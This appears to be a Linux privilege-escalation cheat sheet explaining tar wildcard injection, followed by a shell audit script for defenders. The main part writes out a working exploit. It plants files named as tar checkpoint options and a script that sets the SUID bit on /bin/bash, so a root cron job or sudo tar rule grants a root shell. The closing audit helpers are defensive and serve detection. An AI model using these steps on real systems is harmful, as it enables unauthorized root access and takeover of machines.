PRIMARY CATEGORY → LINUX PRIVESC
TAR
This technique leverages wildcard characters, such as *, together with some dangerous tar options, when tar is executed as follows:
cd /home/<USER> && tar -czvf <USER>_backup.tar *
Since the * character expands to every existing, non-hidden file in the current directory, we can create files named after the following tar options:
--checkpoint[=N]
Display progress messages every Nth record (default 10).
--checkpoint-action=ACTION
Run ACTION on each checkpoint.
So, the command that tar actually receives will look like this:
cd /home/<USER> && tar -czvf <USER>_backup.tar --checkpoint=1 --checkpoint-action=exec=bash <MALICIOUS_SCRIPT>
Identifying the Misconfiguration
Cron Job
That said, imagine we have found a cron job that runs every minute as root:
*/01 * * * * tar -czvf backup.tar *
Sudo Privilege
Or we run sudo -l and see that we can run the following command as root:
tar -czvf john_backup.tar *
Creating the malicious script
So first, we have to create a malicious script somewhere:
echo 'chmod u+s /bin/bash' > /tmp/script.bash
Creating the “TAR Option” files
Then, we create the following files in the current directory:
echo '' > '--checkpoint-action=exec=/bin/bash /tmp/script.bash'
echo '' > '--checkpoint=1'
Lastly, we wait for the given cron job to run, or run the sudo command.
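From the defender's side, the same mechanics give two cheap checks: look for option-like filenames (starting with -) in directories that a privileged job globs, and flag job lines that run tar on a bare * instead of ./* (with ./*, a file named ./--checkpoint=1 is a path, not an option). The audit helpers below are an added example, not part of the original notes; the directory contents in demo are constructed sample data.

```shell
#!/bin/sh
# Audit helpers (added example, not from the original notes).

# Count files in DIR whose names begin with '-'. Any such file would be
# expanded by a bare '*' and handed to tar as an option, so it deserves
# an alert on a directory that a privileged backup job globs.
count_option_named_files() {
    dir="$1"
    n=0
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue          # glob matched nothing: skip
        n=$((n + 1))
        printf 'option-like filename: %s\n' "$f" >&2
    done
    printf '%s\n' "$n"
}

# Return 0 (true) when a cron/sudo command line runs tar on a bare '*'.
# The hardened form passes './*' instead, which never matches ' *'.
flag_tar_wildcard() {
    case "$1" in
        *tar*' *'*) return 0 ;;
        *) return 1 ;;
    esac
}

# Demo on a constructed temporary directory (sample data, not real files).
demo() {
    d=$(mktemp -d)
    touch "$d/notes.txt" "$d/--checkpoint=1" "$d/--checkpoint-action=exec=sh"
    count_option_named_files "$d"          # prints 2 after listing both names
    rm -rf "$d"
    flag_tar_wildcard 'tar -czvf backup.tar *' && echo 'unsafe job line'
    flag_tar_wildcard 'tar -czvf backup.tar ./*' || echo 'safe job line'
}

demo
```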